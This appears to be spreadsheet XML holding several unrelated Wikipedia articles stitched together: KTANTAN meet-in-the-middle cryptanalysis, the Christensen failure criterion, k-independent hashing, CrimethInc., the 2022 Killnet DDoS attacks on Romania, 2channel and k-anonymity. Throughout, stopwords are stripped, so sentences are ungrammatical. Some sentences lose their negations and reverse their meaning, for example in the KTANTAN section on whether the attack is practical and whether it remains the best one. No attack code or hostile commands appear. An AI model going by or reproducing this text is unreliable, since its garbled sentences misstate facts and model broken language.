key-reducing phase, tested another plain-/ciphertext pair. this done simply seeing encryption plaintext, yields known ciphertext, usually pairs needed here, makes 3-subset mitm attack, little data complexity. example following example based attack done rechberger bogdanov ktantan cipher-family. naming-conventions used paper also used example. attack reduces computational complexity ktantan32 75.170 {\displaystyle 2^{75.170}} {\displaystyle 2^{80}} compared bruteforce attack. computational complexity 75.170 {\displaystyle 2^{75.170}} 2014 still practical break, attack thus computationally feasible now. goes ktantan48 ktantan64, complexities seen example. attack possible, weaknesses exploited ktantan's bit-wise key-schedule. applicable ktantan32, ktantan48 ktantan64, since variations uses key-schedule. applicable related kantan family block-ciphers, variations key-schedule ktantan kantan. overview ktantan ktantan lightweight block-cipher, meant constrained platforms rfid tags, cryptographic primitive aes, would either impossible (given hardware) expensive implement. invented canniere, dunkelman knezevic 2009. takes block size either bits, encrypts using 80-bit rounds. each round utilizes bits (selected schedule) round key. attack preparation preparation attack, weaknesses schedule ktantan allows 3-subset mitm attack identified. since key-bits used round, diffusion round small safety lies number rounds. structure key-schedule, possible find large number consecutive rounds, never utilized certain key-bits. more precisely, authors attack found that: round never uses key-bits: {\displaystyle k_{32},k_{39},k_{44},k_{61},k_{66},k_{75}} round never uses key-bits: {\displaystyle k_{3},k_{20},k_{41},k_{47},k_{63},k_{74}} this characteristics key-schedule used staging 3-subset mitm attack, able split cipher blocks independent key-bits. parameters attack thus: {\displaystyle a_{0}} keybits used blocks (which means rest bits mentioned above) {\displaystyle a_{1}} keybits used first block (defined round 1-111) {\displaystyle a_{2}} keybits used second block (defined round 131-254) key-reducing phase notice problem step key-reducing phase. possible directly compare values {\displaystyle {\displaystyle {\displaystyle calculated round 111, {\displaystyle calculated start round 131. this mitigated another mitm technique called partial-matching. authors found calculating forwards intermediate value {\displaystyle backwards intermediate value {\displaystyle round 127, bits still unchanged {\displaystyle {\displaystyle probability one. they thus compared part state, comparing bits bits round ktantan32. bits round bits round ktantan48 ktantan64, respectively). doing yields false positives, nothing increases complexity attack noticeably. key-testing phase ktantan32 requires average pairs find key-candidate, false positives matching part state intermediate values. ktantan48 ktantan64 average still requires plain-/ciphertext pair test find correct key-candidates. results for: ktantan32, computational complexity attack 75.170 {\displaystyle 2^{75.170}} compared {\displaystyle 2^{80}} exhaustive search. data complexity plain-/ciphertext pairs. ktantan48, computational complexity 75.044 {\displaystyle 2^{75.044}} plain-/ciphertext pairs needed. ktantan64 75.584 {\displaystyle 2^{75.584}} plain-/ciphertext pairs needed.the results taken article rechberger bogdanov. this best attack ktantan anymore. best attack 2011 contributed wei, rechberger, guo, wang ling improved upon mitm attack ktantan family. they arrived computational complexity 72.9 {\displaystyle 2^{72.9}} chosen plain-/ciphertext pairs using indirect partial-matching splice mitm techniques. notes</t>
  </si>
  <si>
    <t>Christensen failure criterion</t>
  </si>
  <si>
    <t>christensen failure criterion material failure theory isotropic materials attempts span range ductile brittle materials. two-property form calibrated uniaxial tensile compressive strengths {\displaystyle \left(\sigma _{t}\right)} {\displaystyle \left(\sigma _{c}\right)} theory developed christensen first published 1997. description christensen failure criterion composed separate subcriteria representing competitive failure mechanisms. expressed principal stress components, given polynomial invariants failure criterionfor {\displaystyle 0\leq {\frac {t}{c}}\leq coordinated fracture criterionfor {\displaystyle 0\leq {\frac {t}{c}}\leq {\frac {1}{2}}} geometric form paraboloid principal stress space. fracture criterion (applicable partial range cuts slices paraboloid, leaving three flattened elliptical surfaces fracture cutoff vanishingly small t/c=1/2 grows progressively larger diminishes. organizing principle underlying theory isotropic materials admit distinct classification system based upon ratio. comprehensive failure criterion reduces mises criterion ductile limit, brittle limit, reduces form cannot sustain tensile components stress. many cases verification examined complete range materials extremely ductile extremely brittle types. also, examples applications given. related criteria distinguishing ductile brittle failure behaviors derived interpreted. applications given failure isotropic, polymeric matrix phase fiber composite materials. also strength materials material failure theory mises yield criterion mohr–coulomb theory references</t>
  </si>
  <si>
    <t>K-independent hashing</t>
  </si>
  <si>
    <t>computer science, family hash functions said k-independent, k-wise independent k-universal selecting function random family guarantees hash codes designated keys independent random variables (see precise mathematical definitions below). such families allow good average case performance randomized algorithms data structures, even input data chosen adversary. trade-offs degree independence efficiency evaluating hash function well studied, many k-independent families proposed. background goal hashing usually keys large domain (universe) {\displaystyle smaller range, {\displaystyle bins (labelled {\displaystyle [m]=\{0,\dots ,m-1\}} analysis randomized algorithms data structures, often desirable hash codes various keys "behave randomly". instance, hash code independent random choice {\displaystyle [m]} number keys could analyzed using chernoff bound. deterministic hash function cannot offer guarantee adversarial setting, adversary choose keys precisely preimage bin. furthermore, deterministic hash function allow rehashing: sometimes input data turns hash function (e.g. many collisions), would like change hash function. solution problems pick function randomly large family hash functions. randomness choosing hash function used guarantee desired random behavior hash codes keys interest. first definition along lines universal hashing, guarantees collision probability designated keys. concept {\displaystyle -independent hashing, introduced wegman carter 1981, strengthens guarantees random behavior families {\displaystyle designated keys, adds guarantee uniform distribution hash codes. definitions strictest definition, introduced wegman carter name "strongly universal {\displaystyle _{k}} hash family", following. family hash functions {\displaystyle h=\{h:u\to [m]\}} {\displaystyle -independent {\displaystyle distinct keys {\displaystyle (x_{1},\dots ,x_{k})\in u^{k}} {\displaystyle hash codes (not necessarily distinct) {\displaystyle (y_{1},\dots ,y_{k})\in [m]^{k}} have: {\displaystyle _{h\in h}\left[h(x_{1})=y_{1}\land \cdots \land h(x_{k})=y_{k}\right]=m^{-k}} this definition equivalent following conditions: fixed {\displaystyle x\in {\displaystyle drawn randomly {\displaystyle {\displaystyle h(x)} uniformly distributed {\displaystyle [m]} fixed, distinct keys {\displaystyle x_{1},\dots ,x_{k}\in {\displaystyle drawn randomly {\displaystyle {\displaystyle h(x_{1}),\dots ,h(x_{k})} independent random variables.often inconvenient achieve perfect joint probability {\displaystyle m^{-k}} rounding issues. following, define {\displaystyle (\mu ,k)} -independent family satisfy: {\displaystyle \forall distinct {\displaystyle (x_{1},\dots ,x_{k})\in u^{k}} {\displaystyle \forall (y_{1},\dots ,y_{k})\in [m]^{k}} {\displaystyle ~~\pr _{h\in h}\left[h(x_{1})=y_{1}\land \cdots \land h(x_{k})=y_{k}\right]\leq /m^{k}} observe that, even {\displaystyle close {\displaystyle h(x_{i})} longer independent random variables, often problem analysis randomized algorithms. therefore, common alternative dealing rounding issues prove hash family close statistical distance {\displaystyle -independent family, allows black-box independence properties. techniques polynomials random coefficients original technique constructing k-independent hash functions, given carter wegman, select large prime number choose random numbers modulo numbers coefficients polynomial degree whose values modulo used value hash function. polynomials given degree modulo equally likely, polynomial uniquely determined k-tuple argument-value pairs distinct arguments, follows k-tuple distinct arguments equally likely mapped k-tuple hash values.in general polynomial evaluated finite field. besides fields modulo prime, popular choice field size {\displaystyle 2^{n}} supports fast finite field arithmetic modern computers. this approach taken daniel lemire owen kaser clhash. tabulation hashing tabulation hashing technique mapping keys hash values partitioning bytes, using byte index table random numbers (with different table byte position), combining results table lookups bitwise exclusive operation. thus, requires randomness initialization polynomial method, avoids possibly-slow multiplication operations. 3-independent 4-independent. variations tabulation hashing achieve higher degrees independence performing table lookups based overlapping combinations bits input key, applying simple tabulation hashing iteratively. independence needed different types collision resolution notion k-independence used differentiate different collision resolution hashtables, according level independence required guarantee constant expected time operation. instance, hash chaining takes constant expected time even 2-independent family hash functions, expected time perform search given bounded expected number collisions involved linearity expectation, expected number equals sum, keys hash table, probability given collide. because terms involve probabilistic events involving keys, 2-independence sufficient ensure value would truly random hash function.double hashing another method hashing requires degree independence. form open addressing uses hash functions: determine start probe sequence, determine step size positions probe sequence. long 2-independent, method gives constant expected time operation.on hand, linear probing, simpler form open addressing step size always one, requires 5-independence. guaranteed work constant expected time operation 5-independent hash function, exist 4-independent hash functions takes logarithmic time operation.for cuckoo hashing required k-independence known 2021. 2009 shown {\displaystyle o(\log -independence suffices, least 6-independence needed. another approach tabulation hashing, 6-independent, shown 2012 properties sufficient cuckoo hashing. third approach 2014 slightly modify cuckoo hashtable so-called stash, makes possible nothing 2-independent hash functions. other applications kane, nelson woodruff improved flajolet–martin algorithm distinct elements problem 2010. give {\displaystyle \varepsilon approximation correct answer, need {\displaystyle {\tfrac {\log 1/\varepsilon }{\log \log 1/\varepsilon -independent hash function. count sketch algorithm dimensionality reduction requires hash functions, 2-independent 4-independent. karloff–zwick algorithm max-3sat problem implemented 3-independent random variables. minhash algorithm implemented using {\displaystyle \log {\tfrac {1}{\epsilon -independent hash function proven piotr indyk 1999 references further reading motwani, rajeev; raghavan, prabhakar (1995). randomized algorithms. cambridge university press. 221. isbn 978-0-521-47465-8.</t>
  </si>
  <si>
    <t>CrimethInc.</t>
  </si>
  <si>
    <t>crimethinc., also known cwc, stands either "crimethinc. ex-workers collective" "crimethinc ex-workers ex-collective", decentralized anarchist collective autonomous cells. crimethinc. emerged mid-1990s, initially hardcore zine inside front, began operating collective 1996. since published widely read articles zines anarchist movement distributed posters books publication.crimethinc. cells published books, released records, organized national campaigns globalization representative democracy favor radical community organizing. less public splinter groups carried direct action (including arson hacktivism), hosted international conventions events, maintained local chapters, sparked riots, toured multimedia performance hardcore anarcho-punk musical ensembles. collective received national media academic attention, well criticism praise anarchists activities philosophy. crimethinc. association north american anarcho-punk scene relationship artists genre publishing inside front well recently contemporary anti-capitalist movement. activities activities crimethinc. cells toured hardcore anarcho-punk musical ensembles. 2002, cell olympia, washington staged five-day film festival skill-sharing workshops screenings. cells also supported various large-scale campaigns publicity work, including "unabomber president" "don't just (not) vote" election campaigns well protests free trade area americas 2003 miami, florida. individuals adopting crimethinc. guerre included convicted arsonists, well hacktivists successfully attacked websites dare, republican national committee sites related u.s. president george bush's 2004 re-election campaign. these activities earned collective irregular attention mainstream news media. 2010, several crimethinc. cells worked collaboration anti-capitalists anarchists launch international steal something from work day, coincides united states day. publications creation propaganda described collective's core function. among best-known publications books days war, nights love, expect resistance, evasion, recipes disaster: anarchist cookbook pamphlets change everything: anarchist appeal (available paper, video form) fighting lives which, date, claim printed 600,000 copies), hardcore punk/political zine inside front, music hardcore punk bands. several websites maintained individual cells, including crimethinc.com, operated east cell, hosts propaganda, excerpts available publications, blog activities cells. crimethinc. connected publishing collectives/organizations similar ideas, notably curious george brigade, written number publications including anarchy dinosaurs. 2005, began publishing half-gloss journal, rolling thunder, byline anarchist journal dangerous living", released eighth issue 2009. crimethinc. texts received wide coverage anarchist media academic publications, used reading materials university courses anarchism.crimethinc. also distributes documentaries breaking spell (anti-free-trade) pickaxe (anti-logging).the collective's downtown olympia location burned late 2021 fire. convergences since summer 2002, crimethinc. hosted annual conventions, termed "convergences", open anyone. typically featuring performances traveling theatrical troupes, musicians, direct-action mutual-aid workshops individual participants, few-days-long camping trips attracted coverage newspaper articles, initiated multiple reclaim streets actions, mobilized large critical mass events, catalyzed many activities.the 2007 convergence athens, ohio, impromptu street party resulted arrests minor charges. athens news characterized convergence sort networking, resume-swapping opportunity would-be radicals, free-thinkers, levellers, diggers, neo-luddites assorted malcontents." typical gatherings require attendees something contribute momentum: whether bringing food equipment share, leading discussion group, providing materials write political prisoners. there pattern promoting convergences festivals, reminiscent barnstorming flying circuses travelling sideshows.harper's journalist matthew power described 2006 convergence winona, minnesota follows: several hundred young anarchists around country train-hopped hitchhiked attend annual event known crimethinc convergence...grimy feral-looking, crimethinc kids squatted small groups around clearing....[they] middle several days self-organized workshops, seminars, discussions, ranging mutualist banking theories nineteenth-century anarchist philosopher pierre-joseph proudhon, introductory practicum lock-picking, class making one's menstrual pads .... crimethinc's adherents come together wanted live lives sort solution. they 'the revolution' final product ongoing process; wanted destroy capitalist system create something livable place. these convergences hosted different groups within collective time, typically based initiative local enthusiasts. every year different policy requests released locals field, typically encouraging sober, consensus-based space financial transactions made. firm rule police informants," regulation ignored fbi. information gathered informants crimethinc. convergences 2004, 2005, 2008) contributed convictions eric mcdavid associates, well 2008 republican national convention protester matthew depalma.in 2010, crimethinc. announced everywhere campaign national tours events lieu traditional convergence. 2015, crimethinc. embarked similar change everything two-month tour united states. music crimethinc. associated north american anarcho-punk scene long relationship notable musicians genre publishing inside front, "journal hardcore punk anarchist action". crimethinc. releases include lp's, cd's, 7-inch vinyl records north american european anarcho-punk, hardcore anti-folk bands. academic stacy thompson described crimethinc. "exemplary contemporary nuanced approach" possible forms anarcho-punk could take resist commodification aesthetic expression. however, thompson consider aesthetic choices collective substantially different anarcho- crust punk bands released fellow anarcho-punk collective profane existence mid-to-late 90s. philosophy crimethought ideology value system lifestyle, rather challenging ideologies value systems lifestyles—and, advanced agent, making ideologies, value systems, lifestyles challenging. crimethinc loose association represents variety political views; crimethinc. their frequently-asked questions page asserts platform ideology except could generalized similarities beliefs goals individuals choose involved—and constantly flux." "crimethinc." anonymous tag, means constructing dynamic networks support communication within anarchist movement, anyone publish name create poster using logo; agent group agents operate autonomously. well traditional anarchist opposition state capitalism, agents times advocated straight edge lifestyle, total supersession gender roles, violent insurrection state, refusal work.crimethinc. influenced situationist international, described scholar martin puchner "inheritors political avant-garde", part, authors book criticized "exclusive, anti-subjective" nature history "paralyzing", advocating place non-superstitious myth. collective expressed strident anti-copyright stance advocacy appropriation texts ideas others, attracted criticism academic philosopher george macdonald ross endorsement plagiarism. crimethinc.'s free license known example copyleft. grants rights individuals none corporations.the active participants crimethinc. characterize mindset life first foremost, rather organization main goal inspire people take active control lives, becoming producers culture history instead passive consumers. those subscribe crimethinc. philosophy advocate radical ways living one's life eliminating perceived inequities tyrannies within society. contributors publications generally credited respect anonymity asserted participants organization's primary values. name "crimethinc." satirical self-criticism hypocrisy revolutionary propaganda "margin-walking contradictions", direct reference concept "thoughtcrime" developed george orwell's nineteen eighty-four. references further reading external links official website</t>
  </si>
  <si>
    <t>2022 DDoS attacks on Romania</t>
  </si>
  <si>
    <t>beginning april 2022, 04:05 eest, may, series multiple ddos attacks launched several romanian government, military, bank mass media websites. behind attacks pro-kremlin hacking group killnet, resorted response declaration made florin cîțu, then-president senate romania, romania would provide ukraine military aid. russian federation, invaded latter, publicly spoke western military support ukraine, stating would result "lightning-fast retaliatory strikes". background april 2022, president chamber deputies romania marcel ciolacu, prime minister nicolae ciucă minister foreign affairs bogdan aurescu visited kyiv, ukraine, meet ukrainian president volodymyr zelenskyy, ukrainian prime minister denys shmyhal, president verkhovna rada, ruslan stefanchuk. meeting, romania reiterated support ukraine european integration aspirations, well committing active involvement reconstruction country.the meeting planned since early april, romanian delegation initially consisting president senate florin cîțu president chamber deputies marcel ciolacu, visiting kyiv april invitation stefanchuk. prime minister ciucă justified absence cîțu around fact state visits separately planned, condition safety measures imposed kyiv 2022 russian invasion ukraine. nevertheless, florin cîțu visited kyiv april 2022, stated romania ukraine, supporting military equipment.russia claimed western military support ukraine "posing threat european security". russian president vladimir putin stated someone intends intervene ongoing events [russian invasion ukraine] outside, create strategic threats russia unacceptable know retaliatory strikes lightning-fast". cyberattack april 2022, 04:05 eest, websites ministry national defence (mapn), romanian border police, government romania, călători taken ddos attack. according mapn, cyberattack compromise functioning website, rather prevented user access government stated specialists structures governmental level collaborating experts specialized institutions restore access identify causes. meantime, călători issued alternative means purchasing train tickets digitally.the romanian intelligence service (sri) stated hackers behind cyberattack used network equipment outside romania. pro-kremlin hacking group killnet claimed attacks telegram, stating "the president romanian senate, marcel ciolacu issued statement promising ukrainian authorities "maximum assistance" supplying lethal weapons kyiv". furthermore, revealed list websites took ddos attack, website bank (the romanian division) also listed. directorate investigating organized crime terrorism (diicot) notified case, access websites restored.at 19:30 eest, another ddos attack launched, time website ciolacu-led social democratic party (psd), taking similar manner. response, party's department quickly took action restored access website within minutes.in retaliation, romania's national cybersecurity directorate (dnsc) published list addresses involved april ddos attacks official website. april, approximatively 2:30 eest, website also taken ddos attack pro-kremlin hacking group, user access restored 8:30 eest. later day, ddos attack took website romanian police.the pro-kremlin hacking group threatened take another romanian websites similar manner, including websites stores, military, government, mass-media, banks, hospitals, educational institutions, political parties, etc. some websites using moldovan (.md) domains also included list.on 2022, killnet took websites seven romanian airports (including located bucharest, cluj-napoca, etc.), well tarom airline several news media websites, including digi24, among others.it suspected romanian resident united kingdom helped killnet take romanian websites, translating content romanian language russian language. they custody. retaliation, killnet threatened "destroy romania, united kingdom moldova" released hours. public reactions romania's minister defence, vasile dîncu described cyberattacks "symbolic attacks". president chamber deputies romania marcel ciolacu called nominalization "senate president" killnet mistake presidency senate held florin cîțu), stated needed, romania ready legally morally take step supply ukraine military equipment]. moment time first attacks], decision". meantime, romanian hacking group "anonymous romania" stated launched counterattack russian governmental website.florin cîțu, president senate, reacted well: "first all, know kind hackers know president senate president chamber deputies [...]. secondly, look [killnet's] statement bizarre picture president chamber deputies, correct name, mistake position [...]. simple search wikipedia would found president senate is". also 2022 ukraine cyberattacks cyberwarfare russia list cyberattacks references</t>
  </si>
  <si>
    <t>2channel</t>
  </si>
  <si>
    <t>2channel (japanese: 2ちゃんねる, hepburn: channeru), also known 2ch, channel sometimes retrospectively 2ch.net, anonymous japanese textboard founded 1999 hiroyuki nishimura. described 2007 "japan's popular online community", site level influence comparable traditional mass media television, radio, magazines. time, site drew annual revenue around ¥100 million (about us$1 million), largest kind world, around million visitors million posts made day.the site hosted domain registration provided watkins, based francisco, california. 2009, ownership site transferred singapore-based packet monster inc., nishimura remained control. february 2014, watkins seized 2ch.net domain, taking full control website assuming role site administrator. this resulted textboards claiming legitimate 2channel: 2ch.sc, owned nishimura packet monster inc., 5channel (5ちゃんねる, channeru, domain 5ch.net), established 2017 redirect original domain owned watkins philippines-based loki technology inc. 2channel successors controversial social media japan; extremely popular among japan's extreme right-wing, known netto-uyoku, post xenophobic comments, often targeting koreans. defamation particular concern; august 2008, nishimura received hundred lawsuits defamatory comments left website. announcements crimes also drawn scrutiny towards 2channel successors. 2012, 2channel accused tokyo metropolitan police allowing platform used amphetamine dealers, although charges filed.in september 2007, 2channel averaged million posts day. july 2020, 5channel 1,031 boards receiving around million posts weekends, growth since march 2016. meanwhile, 2ch.sc boards receiving around 5,700 posts daily. history predecessors textboards like 2channel rooted earlier technologies: dial-in bulletin boards, known japan grass roots bulletin boards (草の根bbs), usenet. 2channel predecessors: ayashii world created 1996 shiba masayuki, amezou (あめぞう), created 1997. ayashii world first large anonymous bulletin board japan, amezou originated familiar "textboard" concept wherein threads displayed chronologically, comments bumping threads top, rather branching tree. ayashii world closed 1998, leading former users amezou; nishimura advertised 2channel post amezou 1999, calling "amezou's second channel". from june, amezou became increasingly unable handle load servers,: host shut threats amezou's anonymous owner contained posted it.: early history 2channel founded 1999 college apartment conway, arkansas campus university central arkansas hiroyuki nishimura. success came quickly; many amezou's users began using soon opened. when compared bulletin boards, 2channel's technology much different; success instead "outlet unfettered expression"; hosted united states, 2channel able bypass restrictive japanese censorship rules, still accessible japan. site also enjoyed greater immunity legal action within japan location servers. 2002, google said searched word japan "2channel". 2004, 2channel already largest internet forum japan.the name "2channel" reference channel default setting modulators used earlier-generation game consoles (such nintendo's family computer) connecting japanese television sets. where amezou originally meant "channel one", 2channel meant "channel two".: site's iconic logo reference deprecatory remarks former users ayashii world would make 2channel early site's history, likening spittoon (痰壷).: nishimura took nickname adopted site's logo 2002.jim watkins, ex-us army non-commissioned officer (sergeant first class), domain name registrar, dedicated hosting service provider, hosted 2channel since least 2004 various corporate identities, including big-server.com inc., pacific internet exchange technology inc. before 2channel, watkins' company primarily specialized using servers domains united states serve uncensored pornographic content users japan. ownership transfer government scrutiny january 2009, nishimura claimed transferred ownership 2channel packet monster inc., company based chinatown, singapore, longer involved site's management. however, nishimura charged violating japanese narcotic control laws anyway december 2012. part case, tokyo metropolitan police department (mpd) claimed nishimura remained involved 2channel's operations, alleging packet monster inc. shell company (ペーパーカンパニー). main thrust complaint nishimura allegedly delete posts seeking purchase illicit amphetamine 2channel users online; internet hotline center, agency mpd, alleged 2011 5,223 deletion requests result deletion. march 2013, public prosecutors office decided prosecute case.in august 2013, tokyo regional taxation bureau declared audit nishimura failed declare ¥100 million worth website revenue taxed 2009 2012, years financially benefited packet monster inc.; nishimura settled matter paying owed tax, million. personal information leak august 2013, hacker using name sassy ecchi (さっしーえっち) leaked personal details (including names, addresses, phone numbers) credit card numbers thousands 2channel users used 2channel's paid services public domain, exposing anonymous profiles various high level personas politicians writers, including attorney involved 2channel cases, takahiro karasawa (唐澤貴洋), staff member akb48. more 74,000 users personal information exposed leak.the paid service involved leak known "2channel viewer" (2ちゃんねるビューア), maru (●). main utility allowed users read threads; thread 2channel received 1,000 posts, would become part kako rogu (過去ログ, lit. past log) process ".dat omission" (dat落ち) threads, time thread longer freely accessible. 2channel charged ¥3,600 year service, typically paid credit card; logs payments source data leak.at time leak, watkins apologized behalf technology, inc., saying victim "cyber attack" "some data customers compromised." domain seizure split february 2014, watkins, chairman n.t. technology, inc., 2channel's domain registrar, seized 2channel's domain. took full control website, relieved nishimura power, assumed role website administrator. watkins made kako rogu free users shortly assuming control.watkins claimed nishimura failed money owed seizure cover nishimura's debts, nishimura claimed fact paid everything owed domain transfer illegal domain hijacking. response, nishimura created clone 2channel 2ch.sc, scraping contents entire 2channel website updating 2ch.sc posts appeared 2ch.net. session 4chan shortly becoming site's owner, nishimura claimed 2channel stolen watkins.nishimura attempted repossess domain wipo's uniform domain-name dispute-resolution policy japanese court system. through japan patent office, nishimura owns trademark "2channel", though wipo refused intervene behalf account that, suggesting parties court instead not, view, case "cybersquatting" rather "business dispute".ron watkins, jim's son, 2016 registered trademark "5channel" japan. october 2017, 2ch.net began redirecting 5ch.net, domain owned loki technology, inc. chairman loki technology inc. also watkins; wife, liziel, treasurer majority shareholder. according press release, name changed 5channel avoid potential legal issues nishimura's ownership "2channel" trademark. culture large number boards, types information exchanged 2channel diverse. there boards topics diverse sports, sex, celebrity gossip, computer programming ongoing earthquakes; even academic research gotten start 2channel. anonymous posting distinctive features 2channel anonymous posting. nishimura explained reasons preferring anonymity online annenberg's japan media review thus:if user attached user, discussion tends become criticizing game. hand, anonymous system, even though opinion/information criticized, know upset. also user participate site long time tend authority, becomes difficult user disagree them. under perfectly anonymous system, say, "it's boring," actually boring. information treated equally; accurate argument work.however, frequent criticism directed toward anonymous textboards like 2channel, notably kazuhiko nishi, anonymous nature make mere "toilet graffiti" (便所の落書き). 2channel's anonymity departure english language internet forums require form registration, usually coupled email verification identification individual; anonymity part inspired creation 4chan. 2channel, name field available, seldom used.: pt26 however, open proxies network banned posting 2channel, administrators degree ability help enforcement unmask users necessary. revenue while 2channel successors commercial, 2channel moderated volunteers. 2channel relied advertisements "obscure" companies. 2007, annual revenue around ¥100 million. between 2009 2012, ¥200 million profits transferred nishimura's singaporean shell company.as early 2004, companies dentsu data mining website clients, keeping informed portrayed 2channel users; 2006, content dentsu analyzed behalf customers posted 2channel.2channel also received revenue subscription services like aforementioned maru. part, 5channel subscription service, "premium rōnin" (プレミアム浪人), allows people outside japan post service also hides subscribers. matome 2channel historically allowed anyone data, providing easily parsable format; made simple create third party "dedicated browsers" (専用ブラウザ, sen'yō burauza) posting using 2channel. openness data allowed proliferation matome saito (まとめサイト, summary websites) burogu (アフィブログ, affiliate blogs), summarize 2channel threads attempt collect "best 2channel. 2007, growing discontentment towards sites, nishimura added board, /poverty/, marked every post phrase tensai kinshi (転載禁止, transl. reproduction post prohibited). this caused many users abandon boards board.watkins made priority combat "piracy" 5channel third-party matome sites march 2014, adding tensai kinshi many popular boards. such sites siphon users 2channel itself, receiving excess million monthly pageviews; case matome site earned owner ¥300,000 month. watkins followed rule change restricting access 2channel's data march 2015, requiring dedicated browser authors special access 2channel's, later 5channel's, thread data. phenomena densha otoko densha otoko japanese franchise consisting movie, television series, manga, media, based purportedly true story 23-year-old intervened drunk started harass several women train. ultimately begins dating women. event man's subsequent dates woman, chronicled 2channel, directly inspired franchise. whether original 2channel story actually true debated.: shift_jis 2channel successors, textboards, cannot images posted them. users around this, however, posting expressive form ascii art: shift_jis art. below small sample: controversies slander legal issues during hiroyuki's administration, often openly defiant japanese law, especially around libel, duty follow telling yomiuri shimbun march 2007: intention paying country whose laws respect. long they're handing death sentence, backing down. 2008, nishimura lost fifty libel lawsuits japanese civil courts, assessed millions dollars penalties; august, according him, he'd received hundred lawsuits. while according official pages website, slander prohibited, activists debito arudou claimed site actually respond requests delete posts case, returning mail unopened. after transfer packet monster inc., arudou, still received court ordered penalty, wrote op-ed nishimura transferred assets increase "unaccountability". while nishimura point never paid compensation courts ordered cases, 2010 plaintiffs successful getting compensated publisher nishimura's books. crime announcements crime announcements (犯行予告) regular occurrence 2channel, including mass suicides murders. after 2000 neomugicha incident, hijacked posted 2channel, police officers started regularly policing 2channel; surveillance increased akihabara massacre announced 2008 attack 2channel well. former superintendent tokyo metropolitan police tateshi higuchi called site "den iniquity". according japan times, however, 2channel cooperated police past catching criminals using 2channel giving police addresses, locations determined.such crime announcements continued problem 5channel: speculated carried kyoto animation arson attack posted advance warning crime 5channel. nationalism hate speech 2channel, massive size anonymous posting, abundant slander, hate speech defamation public figures, institutions, minority ethnic groups. far-right users 2channel referred netto-uyoku, term roughly analogous "alt-right". though site rules posts illegal japanese law, scale anonymous nature site makes prompt deletions difficult realize practice. furthermore, occasion, 2channel accused reluctant remove defamatory posts.: discussion boards also often used coordinate real-life demonstrations; example, 2channel users organized august 2011 rally fuji television, complaint channel broadcasting many korean television shows. sankei shimbun reported 2018 5channel, received 2channel's users, reputation attracting netto-uyoku.2channel netto-uyoku frequently make racist comments koreans. 2009, even discovered asahi shimbun employee posted racist remarks towards koreans 2channel. after 2011 tōhoku earthquake tsunami, fake news proliferated 2channel, falsely accusing chinese korean people "plundering" evacuation centers. technology 2channel operated forum software considered innovative time founding, originally written hiroyuki himself, later replaced collective effort unix-savvy users; software known read.cgi. major departure usenet; however, compared japanese textboards time, amezou, 2channel's format much different.boards textboard software threads sorted time last post, making post would "bump" (上げ, age) thread board index. however, posting thread, users function known sage (下げ, lit. lowering) avoid bumping thread way. often, posters sage purpose, avoid unwanted attention. major outages 2010–2011 korean ddos response racism towards koreans 2channel users, especially yuna kim, athlete defeated japan 2010 vancouver olympics, site suffered extended outage march 2010 distributed denial service (ddos) attack conducted korean hacking group. attack watkins' pacific internet exchange affected sites shared network well, including belonging government agencies; estimated cost us$2.5 million. watkins requested american government investigate event instance "cyberterrorism"; according him, sporadic ddos attacks koreans continued 2011. 2015 8chan ddos beginning january 2015, 8chan, also owned watkins hosted network technology, inc., suffered outage ddos attack. attack, 2ch.net, owned watkins operated name 5channel, went well. attacks messageboards lasted least january, leading "many 2channel users become angry management". societal impact september 2007, 2channel averaged million posts day. july 2020, 5channel 1,031 boards receiving around million posts weekends, growth since march 2016. meanwhile, 2ch.sc boards receiving around 5,700 posts daily. popularity, 2channel successors considerable influence japanese society. children's 2channel sites like 2channel minors major concern japan. some children's search sites, kids (キッズgoo), filtered textboards like 2channel. tokyo, local ordinance requires internet service providers develop filters prevent minors accessing sites could harm "sound wholesome fostering youth]"; must also confirm installing connection minors live household.despite this, however, filter provider star february 2007 released results survey showed utilization rate 2channel primary secondary students 12.2%. response threads 2channel certain schools leading cyberbullying, ministry education 2008 released 65-page manual teachers parents handle issue. concerned popularity 2channel among children teenagers, team childhood education professors university ryukyus 2009 published paper making recommendations lawmakers curb use.in february 2020, nishimura wrote op-ed nikkan kogyo shimbun warning parents dangers allowing children unfettered access social media sites like youtube 2channel. politicians 2channel naoto kan, future prime minister member national diet, sent legal notice 2000 demanding 2channel delete post someone falsely claiming him.after liberal democratic party presidential election 2007, prime minister tarō stated fuji interview sometimes posts 2channel. during election season, supporting posts perennial candidates matayoshi jesus akasaka frequently made 2channel, turning something meme, similar repeated candidacies vermin supreme united states. after failed candidacies various political offices, including governor tokyo, akasaka eventually elected tokyo metropolitan assembly, representing minato, april 2019. asahi shimbun credited akasaka's online fame helping surprise victory. 2channel media japanese news organizations often relied 2channel determine issues public thinking about, leads. however, mass media often reports negatively,: similar reported otaku culture decade ago, went mainstream, even though internet trends nowadays routinely slip media. phrase "the online bulletin board says" (インターネットの掲示板で), used reporting, refer either 2channel forums. movements spawned 2channel often receive media attention, noting methods 2channel activists break socially normative behavior bring pressure bear sheer numbers.: beyond this, though, 2channel posts often basis media reports japan.: programs even featured 2channel's moderators users; comedian hikari ōta, example, criticized nishimura discussion tokyo broadcasting system's sandējapon ideal limits free expression applied social networks.shokun! magazine, operation, column known kōjimachi denmō sokkōjo (麹町電網測候所, lit. kōjimachi internet weather station) shared "patriotic" 2channel posts. weekly bunshun (週刊文春, published bungeishunjū), meanwhile, criticized seen overly pro-2channel relying posts much reporting. also futaba channel (2chan) ilbe storehouse, south korea shift tianya club, china footnotes notes references external links official website (5channel) official website (2ch.sc)</t>
  </si>
  <si>
    <t>K-anonymity</t>
  </si>
  <si>
    <t>k-anonymity property possessed certain anonymized data. concept k-anonymity first introduced latanya sweeney pierangela samarati paper published 1998 attempt solve problem: "given person-specific field-structured data, produce release data scientific guarantees individuals subjects data cannot re-identified data remain practically useful." release data said k-anonymity property information person contained release cannot distinguished least {\displaystyle k-1} individuals whose information also appear release. k-anonymity received widespread media coverage 2018 british computer scientist junade used property alongside cryptographic hashing create communication protocol anonymously verify password leaked without disclosing searched password. this protocol implemented public troy hunt's have been pwned? service consumed multiple services including password managers browser extensions. this approach later replicated google's password checkup feature. methods k-anonymization context k-anonymization problems, database table rows columns. each table represents record relating specific member population entries various rows need unique. values various columns values attributes associated members population. following table nonanonymized database consisting patient records fictitious hospital kochi. there attributes records data. there common methods achieving k-anonymity value suppression: method, certain values attributes replaced asterisk '*'. values column replaced '*'. anonymized table below, replaced values 'name' attribute values 'religion' attribute '*'. generalization: method, individual values attributes replaced broader category. example, value '19' attribute 'age' replaced 20', value '23' etc.the next table shows anonymized database. this data 2-anonymity respect attributes 'age', 'gender' 'state domicile' since combination 